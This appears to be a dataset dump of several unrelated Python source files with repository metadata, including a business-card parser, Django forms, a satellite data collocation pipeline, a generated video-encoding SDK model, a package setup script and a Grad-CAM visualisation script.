Input(s): n/a
Output(s): a (dictionary) containing contacts with name (string) as key
Runtime: O(n), n = number of business cards
"""
if __name__ == '__main__':
main()
| 36.819672 | 104 | 0.563001 | import spacy
import ContactInfo
DIVIDER = "~" # CONSTANT which defines dividing str between card entries in a file
class BusinessCardParser:
def __init__(self):
parse = True # could be used as flag in future dev
""" Function getContactInfo
Input(s): document with text from one business card (string).
Output(s): A (ContactInfo) object that contains vital information about the card owner.
Description: Where the magic happens. Calls methods that identify vital info.
"""
def getContactInfo(self, doc):
name = phone = email = False # set variables to False
entries = doc.split('\n')
for entry in entries:
found = False
if not name:
name = self.is_name(entry)
if name:
found = True
if not phone and not found:
phone = self.is_phone(entry)
if phone:
found = True
if not email and not found:
email = self.is_email(entry)
contact = ContactInfo.ContactInfo(name, phone, email)
contact.dumpInfo()
return contact
""" Function isName
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a name, else false (boolean).
Runtime: > O(m), m = characters in entry. Takes long b/c of NLP machine learning
"""
def is_name(self, entry):
nlp = spacy.load("en_core_web_sm")
doc = nlp(entry)
for ent in doc.ents:
if ent.label_ == 'PERSON':
return entry
return False
""" Function isPhone
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a phone, else false (boolean).
Runtime: O(2m) => O(m), m = characters in entry
"""
def is_phone(self, entry):
new_phone = ''
if 'fax' in entry.lower():
return False
for char in entry:
if char.isdigit(): # if we're looking at a number
new_phone += char # add it to the phone number
if len(new_phone) == 10 or len(new_phone) == 11:
return new_phone
return False
""" Function isEmail
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a email, else false (boolean).
Runtime: O(2m) => O(m), m = characters in entry
"""
def is_email(self, entry):
words = entry.split(" ")
for word in words:
if '@' in word:
return word
return False
""" Function starter
* does the heavy lifting (I/O, calling methods)
Input(s): n/a
Output(s): a (dictionary) containing contacts with name (string) as key
Runtime: O(n), n = number of business cards
"""
def starter():
parser = BusinessCardParser()
print("Welcome to the Business Card Parser!")
print("You can input a file of business cards, divided by", DIVIDER, "by inputting the file name.")
print("You can input a business card manually, line by line, by hitting ENTER")
response = input("Input file name or hit ENTER to continue: ")
contacts = {}
if response == "": # user wants to enter card manually
business_card = ""
while True:
response = input("enter line (or 'END' to stop):")
if response.upper() == "END":
break
else:
business_card += (response + '\n') # add new line to manual business card
contact = parser.getContactInfo(business_card)
contacts[contact.getName()] = contact
else: # we got a file (hopefully)
cards_file = open(response, "r")
all_lines = cards_file.readlines()
business_card = ""
for line in all_lines:
if DIVIDER in line:
contact = parser.getContactInfo(business_card)
contacts[contact.getName()] = contact
business_card = ""
else:
business_card += (line + '\n')
contact = parser.getContactInfo(business_card)
contacts[contact.getName()] = contact
return contacts
def main():
_contacts = starter() # contains a dictionary of contacts for future use & dev
if __name__ == '__main__':
main()
| 2,862 | 0 | 181 |
13526b075b407598c9ed9715d00c04476fd42e21 | 573 | py | Python | tests/test_python_check.py | SoftwareStartups/pygithook | 2fa9186a4b8981cc2926fd49917a52a85a563b82 | [
"MIT"
] | null | null | null | tests/test_python_check.py | SoftwareStartups/pygithook | 2fa9186a4b8981cc2926fd49917a52a85a563b82 | [
"MIT"
] | null | null | null | tests/test_python_check.py | SoftwareStartups/pygithook | 2fa9186a4b8981cc2926fd49917a52a85a563b82 | [
"MIT"
] | null | null | null | """Testsuite for vfgithook.pylint_check"""
from vfgithook import pylint_check
from . import util
# pylint: disable=protected-access
def test_is_python_file(gitrepo):
"""Test pylint_check.is_python_file"""
# Extension
file_a = util.write_file(gitrepo, 'a.py', '')
assert pylint_check._is_python_file(file_a)
# Empty
file_b = util.write_file(gitrepo, 'b', '')
assert not pylint_check._is_python_file(file_b)
# Shebang
file_c = util.write_file(gitrepo, 'b', '#!/usr/bin/env python')
assert pylint_check._is_python_file(file_c)
| 22.92 | 67 | 0.710297 | """Testsuite for vfgithook.pylint_check"""
from vfgithook import pylint_check
from . import util
# pylint: disable=protected-access
def test_is_python_file(gitrepo):
"""Test pylint_check.is_python_file"""
# Extension
file_a = util.write_file(gitrepo, 'a.py', '')
assert pylint_check._is_python_file(file_a)
# Empty
file_b = util.write_file(gitrepo, 'b', '')
assert not pylint_check._is_python_file(file_b)
# Shebang
file_c = util.write_file(gitrepo, 'b', '#!/usr/bin/env python')
assert pylint_check._is_python_file(file_c)
| 0 | 0 | 0 |
32a16a55f75b4456cfd80f9c9cce22f840685253 | 32 | py | Python | src/temp/tasks.py | lucemia/django_p_test | 3642f00735392d360d015dce554fccd0dbe2d874 | [
"MIT"
] | null | null | null | src/temp/tasks.py | lucemia/django_p_test | 3642f00735392d360d015dce554fccd0dbe2d874 | [
"MIT"
] | null | null | null | src/temp/tasks.py | lucemia/django_p_test | 3642f00735392d360d015dce554fccd0dbe2d874 | [
"MIT"
] | null | null | null | from django_p.tasks import Pipe
| 16 | 31 | 0.84375 | from django_p.tasks import Pipe
| 0 | 0 | 0 |
129b8e38aa216e22d39c6892742cec6e61022d52 | 309 | py | Python | xlab/data/calc/__init__.py | dayfine/xlab | 2c51d84906d5eba568e5b5c70225c2eccb1b9fc3 | [
"MIT"
] | 2 | 2020-05-06T04:05:30.000Z | 2020-11-10T16:23:50.000Z | xlab/data/calc/__init__.py | dayfine/xlab | 2c51d84906d5eba568e5b5c70225c2eccb1b9fc3 | [
"MIT"
] | 14 | 2020-05-06T06:37:50.000Z | 2021-10-30T03:38:05.000Z | xlab/data/calc/__init__.py | dayfine/xlab | 2c51d84906d5eba568e5b5c70225c2eccb1b9fc3 | [
"MIT"
] | null | null | null | from xlab.data.calc.interface import RecursiveInputs
from xlab.data.calc.interface import SourceInputs
from xlab.data.calc.interface import CalcInputs
from xlab.data.calc.interface import CalcTimeSpecs
from xlab.data.calc.interface import CalcProducer
from xlab.data.calc.interface import CalcProducerFactory
| 44.142857 | 56 | 0.864078 | from xlab.data.calc.interface import RecursiveInputs
from xlab.data.calc.interface import SourceInputs
from xlab.data.calc.interface import CalcInputs
from xlab.data.calc.interface import CalcTimeSpecs
from xlab.data.calc.interface import CalcProducer
from xlab.data.calc.interface import CalcProducerFactory
| 0 | 0 | 0 |
d260b0c05487ef9bc11a658508f81ea27e3b3992 | 841 | py | Python | myauth/forms.py | dedol1/verauth_api | ca242abfdcc5296ca4c459e4e92c5dd313cd7160 | [
"MIT"
] | null | null | null | myauth/forms.py | dedol1/verauth_api | ca242abfdcc5296ca4c459e4e92c5dd313cd7160 | [
"MIT"
] | null | null | null | myauth/forms.py | dedol1/verauth_api | ca242abfdcc5296ca4c459e4e92c5dd313cd7160 | [
"MIT"
] | 1 | 2021-11-02T11:55:26.000Z | 2021-11-02T11:55:26.000Z | from django import forms
from .models import *
| 33.64 | 107 | 0.536266 | from django import forms
from .models import *
class ImageForm(forms.ModelForm):
class Meta:
model= User
fields = ('username', 'first_name', 'last_name','password', 'email',)
widgets = {
'first_name': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Ex: John Doe'}),
'last_name': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Ex: John Doe2'}),
'username': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Ex: 30'}),
'email': forms.TextInput(attrs={'class': 'form-control'}),
}
class ImageFormTwo(forms.ModelForm):
class Meta:
model = TwoFactor
fields = ('img',)
# widgets = {
# 'img': forms.FileField(),
# } | 0 | 732 | 49 |
9964dfc6eb57f2989b5fa962e1e9f520802f8a82 | 1,542 | py | Python | modules/radiusd.py | dhtech/puppet-modules | a5ddcdc6a01d87052043f075f417e692a26883a8 | [
"BSD-3-Clause"
] | 3 | 2018-10-23T21:14:01.000Z | 2018-11-28T08:55:12.000Z | modules/radiusd.py | dhtech/puppet-modules | a5ddcdc6a01d87052043f075f417e692a26883a8 | [
"BSD-3-Clause"
] | 125 | 2018-10-26T08:35:52.000Z | 2021-11-28T13:18:48.000Z | modules/radiusd.py | dhtech/puppet-modules | a5ddcdc6a01d87052043f075f417e692a26883a8 | [
"BSD-3-Clause"
] | 2 | 2021-11-18T19:09:49.000Z | 2021-11-26T12:56:19.000Z | # Copyright 2018 dhtech
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file
import lib
# vim: ts=4: sts=4: sw=4: expandtab
| 30.84 | 57 | 0.661479 | # Copyright 2018 dhtech
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file
import lib
def generate(host, *args):
access_node_ips = lib.resolve_nodes_to_ip(
lib.get_nodes_with_layer('access'))
dist_node_ips = lib.resolve_nodes_to_ip(
lib.get_nodes_with_layer('dist'))
core_node_ips = lib.resolve_nodes_to_ip(
lib.get_nodes_with_layer('core'))
firewall_node_ips = lib.resolve_nodes_to_ip(
lib.get_nodes_with_layer('firewall'))
partner_node_ips = lib.resolve_nodes_to_ip(
lib.get_nodes_with_layer('partner'))
access_ips = []
for node, addresses in access_node_ips.iteritems():
access_ips.append([node, addresses[0]])
dist_ips = []
for node, addresses in dist_node_ips.iteritems():
dist_ips.append([node, addresses[0]])
core_ips = []
for node, addresses in core_node_ips.iteritems():
core_ips.append([node, addresses[0]])
firewall_ips = []
for node, addresses in firewall_node_ips.iteritems():
firewall_ips.append([node, addresses[0]])
partner_ips = []
for node, addresses in partner_node_ips.iteritems():
partner_ips.append([node, addresses[0]])
info = {}
info['access_ips'] = access_ips
info['dist_ips'] = dist_ips
info['core_ips'] = core_ips
info['firewall_ips'] = firewall_ips
info['partner_ips'] = partner_ips
return {'radiusd': info}
# vim: ts=4: sts=4: sw=4: expandtab
| 1,343 | 0 | 23 |
fc93e4b656c844361c9ae7b2fbcaa70e55f59061 | 658 | py | Python | Sentiment.py | Elon-Chan/Sentiment-Analysis | dd7ec0dcdc4944a7366c289707aa46788558e0a2 | [
"MIT"
] | null | null | null | Sentiment.py | Elon-Chan/Sentiment-Analysis | dd7ec0dcdc4944a7366c289707aa46788558e0a2 | [
"MIT"
] | null | null | null | Sentiment.py | Elon-Chan/Sentiment-Analysis | dd7ec0dcdc4944a7366c289707aa46788558e0a2 | [
"MIT"
] | null | null | null | import dash
from dash.dependencies import Input, Output
import dash_core_components as dcc # graphs etc
import dash_html_components as html # tags etc
app = dash.Dash() # dash can combine wth flask
app.layout = html.Div(children=[
dcc.Input(id = "Input", value = "Enter Something", type = "text"),
html.Div(id = "Output")
])
@app.callback(
Output(component_id="Output", component_property = "children"),
[Input(component_id="Input", component_property = "value")]
)
if __name__ == "__main__":
app.run_server(debug=True) | 25.307692 | 68 | 0.699088 | import dash
from dash.dependencies import Input, Output
import dash_core_components as dcc # graphs etc
import dash_html_components as html # tags etc
app = dash.Dash() # dash can combine wth flask
app.layout = html.Div(children=[
dcc.Input(id = "Input", value = "Enter Something", type = "text"),
html.Div(id = "Output")
])
@app.callback(
Output(component_id="Output", component_property = "children"),
[Input(component_id="Input", component_property = "value")]
)
def update_value(input_data):
try:
return str(float(input_data)**2)
except:
return "Some error"
if __name__ == "__main__":
app.run_server(debug=True) | 84 | 0 | 25 |
d032a6823e79d63d9ed63bc9a034259c6ad8939d | 71 | py | Python | cachetclient/__init__.py | neutron-ah/cachet-client | ad233e4b3ced956ad698e110ae547ba10d15f9a2 | [
"MIT"
] | null | null | null | cachetclient/__init__.py | neutron-ah/cachet-client | ad233e4b3ced956ad698e110ae547ba10d15f9a2 | [
"MIT"
] | null | null | null | cachetclient/__init__.py | neutron-ah/cachet-client | ad233e4b3ced956ad698e110ae547ba10d15f9a2 | [
"MIT"
] | null | null | null | from cachetclient.client import Client # noqa
___version__ = '3.0.0'
| 17.75 | 46 | 0.746479 | from cachetclient.client import Client # noqa
___version__ = '3.0.0'
| 0 | 0 | 0 |
044933f4e745b3f4ae6f65b666a90c8f86de3d53 | 6,160 | py | Python | main/collocation_processor_v2.py | dr1315/Collocation_v2 | b0fceedb4e5dcdd3900e56854435dea48a132642 | [
"MIT"
] | null | null | null | main/collocation_processor_v2.py | dr1315/Collocation_v2 | b0fceedb4e5dcdd3900e56854435dea48a132642 | [
"MIT"
] | null | null | null | main/collocation_processor_v2.py | dr1315/Collocation_v2 | b0fceedb4e5dcdd3900e56854435dea48a132642 | [
"MIT"
] | null | null | null | '''
Main processor for v2 of the collocation between CALIOP and Himawari-8.
'''
import os
import sys
import traceback
from datetime import datetime
from pyhdf.SD import SD, SDC
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--list_of_files",
nargs="?",
type=str,
help="name of .txt file listing all the files to be downloaded"
)
parser.add_argument(
"-f",
"--filename",
nargs="?",
type=str,
help="name of file to be downloaded"
)
parser.add_argument(
"-d",
"--target_directory",
nargs="?",
default=os.getcwd(),
type=str,
help="full path to the directory where the files will be stored"
)
args = parser.parse_args()
if args.list_of_files is not None:
main(args.list_of_files, args.target_directory)
elif args.filename is not None:
full_collocation(args.filename, args.target_directory)
else:
raise Exception('Need to provide a filename or a text file containing a list of filenames')
| 44.963504 | 296 | 0.677597 | '''
Main processor for v2 of the collocation between CALIOP and Himawari-8.
'''
import os
import sys
import traceback
from datetime import datetime
from pyhdf.SD import SD, SDC
def log_w_message(message):
dt_now = datetime.now().strftime("%d/%m/%Y %H:%M:%S.%f")
dt_message = f'{dt_now} - {message}'
print(dt_message)
return dt_message
def build_temp_folders(fname, target_dir):
staging_dir = os.path.join(target_dir, fname[:-4])
if not os.path.exists(staging_dir) and not os.path.isdir(staging_dir):
os.mkdir(staging_dir)
archive_dir = os.path.join(staging_dir, '.o+e_archive')
if not os.path.exists(archive_dir) and not os.path.isdir(archive_dir):
os.mkdir(archive_dir)
proc_data_dir = os.path.join(staging_dir, '.proc_data')
if not os.path.exists(proc_data_dir) and not os.path.isdir(proc_data_dir):
os.mkdir(proc_data_dir)
return staging_dir, archive_dir, proc_data_dir
def read_list(filename):
with open(filename, 'r') as f:
all_lines = [line[:-1] for line in f.readlines()]
header = [line for line in all_lines if line.startswith('#')]
good_lines = [line for line in all_lines if not line.startswith('#')]
return header, good_lines
def decompress_h8_data(data_dir):
h8_dirs = [dirs[1] for dirs in os.walk(data_dir)][0]
print(h8_dirs)
for h8_dir in h8_dirs:
full_dir = os.path.join(data_dir, h8_dir)
os.chdir(full_dir)
os.system(f'tar -xf {os.path.join(full_dir, "HS_H08_"+h8_dir+"_FLDK.tar")}')
os.system(f'rm {os.path.join(full_dir, "HS_H08_"+h8_dir+"_FLDK.tar")}')
os.system(f'bunzip2 {full_dir}/*.bz2')
def full_collocation(fname, target_dir):
caliop_filename = fname.split('/')[-1]
if 'CAL' not in caliop_filename:
raise Exception('Filename is not an acceptable format')
if caliop_filename[-4:] != '.hdf':
caliop_filename = caliop_filename + '.hdf'
if 'V4-21' in caliop_filename:
caliop_filename = caliop_filename.replace('V4-21', 'V4-20')
fname = fname.replace('V4-21', 'V4-20')
print(caliop_filename)
log_w_message(f'Initiating collocation for {caliop_filename}')
staging_dir, archive_dir, proc_data_dir = build_temp_folders(fname, target_dir)
os.chdir(staging_dir)
log_w_message(f'Getting CALIOP file: {caliop_filename}')
os.system(f'qsub -W block=True -v "FNAME={fname},TARGET_DIR={proc_data_dir}" -o {os.path.join(archive_dir, "get_caliop_output.txt")} -e {os.path.join(archive_dir, "get_caliop_error.txt")} /g/data/k10/dr1709/code/Personal/Collocation/v2/data_grabbers/caliop_data_grabber.qsub')
if not os.path.exists(os.path.join(proc_data_dir, caliop_filename)):
raise Exception('CALIOP file %s cannot be retrieved' % caliop_filename)
log_w_message('CALIOP file retrieved')
log_w_message(f'Finding Himawari-8 scenes that collocate with {caliop_filename}')
sys.path.append('/g/data/k10/dr1709/code/Personal/Collocation/v2/collocators')
from rough_collocator import main as rc_main
rc_main(os.path.join(proc_data_dir, fname), staging_dir)
log_w_message('Collocated Himawari-8 scenes found')
log_w_message('Getting collocated Himawari-8 folders from mdss')
os.system(f'qsub -W block=True -v "FNAME={fname},TARGET_DIR={staging_dir}" -o {os.path.join(archive_dir, "get_himawari_output.txt")} -e {os.path.join(archive_dir, "get_himawari_error.txt")} /g/data/k10/dr1709/code/Personal/Collocation/v2/data_grabbers/himawari_data_grabber.qsub')
log_w_message('All collocated Himawari-8 folders retrieved')
log_w_message('Decompressing compressed Himawari-8 data')
decompress_h8_data(proc_data_dir)
log_w_message('Decompression complete')
log_w_message('Carrying out collocation of Himawari-8 and CALIOP data')
os.system(f'qsub -W block=True -v "FNAME={fname},TARGET_DIR={staging_dir}" -o {os.path.join(archive_dir, "parallel_collocation_output.txt")} -e {os.path.join(archive_dir, "parallel_collocation_error.txt")} /g/data/k10/dr1709/code/Personal/Collocation/v2/collocators/parallel_collocator.qsub')
log_w_message(f'Collocated data stored in {staging_dir}')
log_w_message('Cleaning out Himawari-8 and CALIOP data')
os.system(f'rm -r {proc_data_dir}')
def main(list_of_files, target_dir):
log_w_message('Reading in filenames')
header, fnames = read_list(list_of_files)
log_w_message(f'Running for {len(fnames)} files')
#num_failures = 0
for n, fname in enumerate(fnames):
try:
full_collocation(fname=fname, target_dir=target_dir)
fnames[n] = '# ' + fname
with open(list_of_files,'w') as f:
f.writelines([head_line + '\n' for head_line in header] + [lst_fname + '\n' for lst_fname in fnames])
except Exception as e:
log_w_message(f'{fname} collocation failed')
traceback.print_exc()
#if num_failures < 2:
# num_failures += 1
#else:
# break
staging_dir_name = fname.split('/')[-1][:-4]
os.system(f'rm -r {os.path.join(target_dir, staging_dir_name)}')
pass
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--list_of_files",
nargs="?",
type=str,
help="name of .txt file listing all the files to be downloaded"
)
parser.add_argument(
"-f",
"--filename",
nargs="?",
type=str,
help="name of file to be downloaded"
)
parser.add_argument(
"-d",
"--target_directory",
nargs="?",
default=os.getcwd(),
type=str,
help="full path to the directory where the files will be stored"
)
args = parser.parse_args()
if args.list_of_files is not None:
main(args.list_of_files, args.target_directory)
elif args.filename is not None:
full_collocation(args.filename, args.target_directory)
else:
raise Exception('Need to provide a filename or a text file containing a list of filenames')
| 4,860 | 0 | 142 |
4c2fb08ef1f0a5f702a10eed2b5a89ceea0f9097 | 7,534 | py | Python | bitmovin_api_sdk/models/audio_mix_input_stream_channel.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 11 | 2019-07-03T10:41:16.000Z | 2022-02-25T21:48:06.000Z | bitmovin_api_sdk/models/audio_mix_input_stream_channel.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 8 | 2019-11-23T00:01:25.000Z | 2021-04-29T12:30:31.000Z | bitmovin_api_sdk/models/audio_mix_input_stream_channel.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 13 | 2020-01-02T14:58:18.000Z | 2022-03-26T12:10:30.000Z | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
from bitmovin_api_sdk.models.audio_mix_channel_type import AudioMixChannelType
import pprint
import six
| 35.706161 | 164 | 0.655296 | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
from bitmovin_api_sdk.models.audio_mix_channel_type import AudioMixChannelType
import pprint
import six
class AudioMixInputStreamChannel(object):
@poscheck_model
def __init__(self,
input_stream_id=None,
output_channel_type=None,
output_channel_number=None,
source_channels=None):
# type: (string_types, AudioMixChannelType, int, list[AudioMixInputStreamSourceChannel]) -> None
self._input_stream_id = None
self._output_channel_type = None
self._output_channel_number = None
self._source_channels = list()
self.discriminator = None
if input_stream_id is not None:
self.input_stream_id = input_stream_id
if output_channel_type is not None:
self.output_channel_type = output_channel_type
if output_channel_number is not None:
self.output_channel_number = output_channel_number
if source_channels is not None:
self.source_channels = source_channels
@property
def openapi_types(self):
types = {
'input_stream_id': 'string_types',
'output_channel_type': 'AudioMixChannelType',
'output_channel_number': 'int',
'source_channels': 'list[AudioMixInputStreamSourceChannel]'
}
return types
@property
def attribute_map(self):
attributes = {
'input_stream_id': 'inputStreamId',
'output_channel_type': 'outputChannelType',
'output_channel_number': 'outputChannelNumber',
'source_channels': 'sourceChannels'
}
return attributes
@property
def input_stream_id(self):
# type: () -> string_types
"""Gets the input_stream_id of this AudioMixInputStreamChannel.
The id of the input stream that should be used for mixing.
:return: The input_stream_id of this AudioMixInputStreamChannel.
:rtype: string_types
"""
return self._input_stream_id
@input_stream_id.setter
def input_stream_id(self, input_stream_id):
# type: (string_types) -> None
"""Sets the input_stream_id of this AudioMixInputStreamChannel.
The id of the input stream that should be used for mixing.
:param input_stream_id: The input_stream_id of this AudioMixInputStreamChannel.
:type: string_types
"""
if input_stream_id is not None:
if not isinstance(input_stream_id, string_types):
raise TypeError("Invalid type for `input_stream_id`, type has to be `string_types`")
self._input_stream_id = input_stream_id
@property
def output_channel_type(self):
# type: () -> AudioMixChannelType
"""Gets the output_channel_type of this AudioMixInputStreamChannel.
:return: The output_channel_type of this AudioMixInputStreamChannel.
:rtype: AudioMixChannelType
"""
return self._output_channel_type
@output_channel_type.setter
def output_channel_type(self, output_channel_type):
# type: (AudioMixChannelType) -> None
"""Sets the output_channel_type of this AudioMixInputStreamChannel.
:param output_channel_type: The output_channel_type of this AudioMixInputStreamChannel.
:type: AudioMixChannelType
"""
if output_channel_type is not None:
if not isinstance(output_channel_type, AudioMixChannelType):
raise TypeError("Invalid type for `output_channel_type`, type has to be `AudioMixChannelType`")
self._output_channel_type = output_channel_type
@property
def output_channel_number(self):
# type: () -> int
"""Gets the output_channel_number of this AudioMixInputStreamChannel.
Number of this output channel. If type is 'CHANNEL_NUMBER', this must be set.
:return: The output_channel_number of this AudioMixInputStreamChannel.
:rtype: int
"""
return self._output_channel_number
@output_channel_number.setter
def output_channel_number(self, output_channel_number):
# type: (int) -> None
"""Sets the output_channel_number of this AudioMixInputStreamChannel.
Number of this output channel. If type is 'CHANNEL_NUMBER', this must be set.
:param output_channel_number: The output_channel_number of this AudioMixInputStreamChannel.
:type: int
"""
if output_channel_number is not None:
if not isinstance(output_channel_number, int):
raise TypeError("Invalid type for `output_channel_number`, type has to be `int`")
self._output_channel_number = output_channel_number
@property
def source_channels(self):
# type: () -> list[AudioMixInputStreamSourceChannel]
"""Gets the source_channels of this AudioMixInputStreamChannel.
List of source channels to be mixed
:return: The source_channels of this AudioMixInputStreamChannel.
:rtype: list[AudioMixInputStreamSourceChannel]
"""
return self._source_channels
@source_channels.setter
def source_channels(self, source_channels):
# type: (list) -> None
"""Sets the source_channels of this AudioMixInputStreamChannel.
List of source channels to be mixed
:param source_channels: The source_channels of this AudioMixInputStreamChannel.
:type: list[AudioMixInputStreamSourceChannel]
"""
if source_channels is not None:
if not isinstance(source_channels, list):
raise TypeError("Invalid type for `source_channels`, type has to be `list[AudioMixInputStreamSourceChannel]`")
self._source_channels = source_channels
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if value is None:
continue
if isinstance(value, list):
if len(value) == 0:
continue
result[self.attribute_map.get(attr)] = [y.value if isinstance(y, Enum) else y for y in [x.to_dict() if hasattr(x, "to_dict") else x for x in value]]
elif hasattr(value, "to_dict"):
result[self.attribute_map.get(attr)] = value.to_dict()
elif isinstance(value, Enum):
result[self.attribute_map.get(attr)] = value.value
elif isinstance(value, dict):
result[self.attribute_map.get(attr)] = {k: (v.to_dict() if hasattr(v, "to_dict") else v) for (k, v) in value.items()}
else:
result[self.attribute_map.get(attr)] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AudioMixInputStreamChannel):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 1,407 | 5,860 | 23 |
5ddcb4984ecded396bfad62244969faef3d13010 | 1,342 | py | Python | integrationtest/vm/virtualrouter/suite_teardown.py | sherry546/zstack-woodpecker | 54a37459f2d72ce6820974feaa6eb55772c3d2ce | [
"Apache-2.0"
] | 1 | 2021-03-21T12:41:11.000Z | 2021-03-21T12:41:11.000Z | integrationtest/vm/virtualrouter/suite_teardown.py | sherry546/zstack-woodpecker | 54a37459f2d72ce6820974feaa6eb55772c3d2ce | [
"Apache-2.0"
] | null | null | null | integrationtest/vm/virtualrouter/suite_teardown.py | sherry546/zstack-woodpecker | 54a37459f2d72ce6820974feaa6eb55772c3d2ce | [
"Apache-2.0"
] | 1 | 2017-05-19T06:40:40.000Z | 2017-05-19T06:40:40.000Z | '''
Integration Test Teardown case
@author: Youyk
'''
import zstacklib.utils.linux as linux
import zstacklib.utils.http as http
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.clean_util as clean_util
import zstackwoodpecker.test_lib as test_lib
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
| 33.55 | 116 | 0.777198 | '''
Integration Test Teardown case
@author: Youyk
'''
import zstacklib.utils.linux as linux
import zstacklib.utils.http as http
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.clean_util as clean_util
import zstackwoodpecker.test_lib as test_lib
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
def test():
clean_util.cleanup_all_vms_violently()
clean_util.cleanup_none_vm_volumes_violently()
clean_util.umount_all_primary_storages_violently()
clean_util.cleanup_backup_storage()
#linux.remove_vlan_eth("eth0", 10)
#linux.remove_vlan_eth("eth0", 11)
cmd = host_plugin.DeleteVlanDeviceCmd()
cmd.vlan_ethname = 'eth0.10'
hosts = test_lib.lib_get_all_hosts_from_plan()
if type(hosts) != type([]):
hosts = [hosts]
for host in hosts:
http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.DELETE_VLAN_DEVICE_PATH), cmd)
cmd.vlan_ethname = 'eth0.11'
for host in hosts:
http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.DELETE_VLAN_DEVICE_PATH), cmd)
test_lib.setup_plan.stop_node()
test_lib.lib_cleanup_host_ip_dict()
test_util.test_pass('VirtualRouter Teardown Success')
| 895 | 0 | 23 |
488a4bfce3b9103661a834646b1fcb2c2647966c | 921 | py | Python | setup.py | rhysjaques/ringdown | eca49a2d0da37e4d95e5b2dfa5a454c534e73ebe | [
"MIT"
] | 2 | 2020-11-12T01:51:08.000Z | 2021-08-23T11:47:39.000Z | setup.py | rhysjaques/ringdown | eca49a2d0da37e4d95e5b2dfa5a454c534e73ebe | [
"MIT"
] | null | null | null | setup.py | rhysjaques/ringdown | eca49a2d0da37e4d95e5b2dfa5a454c534e73ebe | [
"MIT"
] | 1 | 2021-01-13T14:35:20.000Z | 2021-01-13T14:35:20.000Z | from setuptools import setup
import os
import re
VERSION_REGEX = re.compile("__version__ = \"(.*?)\"")
CONTENTS = readfile(
os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"ringdown",
"__init__.py"
)
)
VERSION = VERSION_REGEX.findall(CONTENTS)[0]
setup(
name="ringdown",
author="Matthew Pitkin",
author_email="matthew.pitkin@ligo.org",
url="https://github.com/mattpitkin/ringdown",
version=VERSION,
packages=["ringdown"],
install_requires=readfile(
os.path.join(os.path.dirname(__file__), "requirements.txt")
),
license="MIT",
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
) | 24.236842 | 67 | 0.62975 | from setuptools import setup
import os
import re
def readfile(filename):
with open(filename, encoding="utf-8") as fp:
filecontents = fp.read()
return filecontents
VERSION_REGEX = re.compile("__version__ = \"(.*?)\"")
CONTENTS = readfile(
os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"ringdown",
"__init__.py"
)
)
VERSION = VERSION_REGEX.findall(CONTENTS)[0]
setup(
name="ringdown",
author="Matthew Pitkin",
author_email="matthew.pitkin@ligo.org",
url="https://github.com/mattpitkin/ringdown",
version=VERSION,
packages=["ringdown"],
install_requires=readfile(
os.path.join(os.path.dirname(__file__), "requirements.txt")
),
license="MIT",
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
) | 108 | 0 | 23 |
bf2391ee72be3d88acb4bb10c7ed3d06f2f32f68 | 6,756 | py | Python | gradcam.py | Fuchai/pytorch-grad-cam | 0f5f5ff35c029cb3cdc6496fe9e1dfee8a0dc9f5 | [
"MIT"
] | null | null | null | gradcam.py | Fuchai/pytorch-grad-cam | 0f5f5ff35c029cb3cdc6496fe9e1dfee8a0dc9f5 | [
"MIT"
] | null | null | null | gradcam.py | Fuchai/pytorch-grad-cam | 0f5f5ff35c029cb3cdc6496fe9e1dfee8a0dc9f5 | [
"MIT"
] | null | null | null | import argparse
import cv2
import numpy as np
import torch
from torch.autograd import Function
from torchvision import models, transforms
def deprocess_image(img):
""" see https://github.com/jacobgil/keras-grad-cam/blob/master/grad-cam.py#L65 """
img = img - np.mean(img)
img = img / (np.std(img) + 1e-5)
img = img * 0.1
img = img + 0.5
img = np.clip(img, 0, 1)
return np.uint8(img * 255)
if __name__ == '__main__':
""" python grad_cam.py <path_to_image>
1. Loads an image with opencv.
2. Preprocesses it for ResNet50 and converts to a pytorch variable.
3. Makes a forward pass to find the category index with the highest score,
and computes intermediate activations.
Makes the visualization. """
args = get_args()
model = models.resnet50(pretrained=True).to(args.device)
grad_cam = GradCam(model=model, feature_module=model.layer4)
img = cv2.imread(args.image_path, 1)
img = np.float32(img) / 255
# Opencv loads as BGR:
img = img[:, :, ::-1]
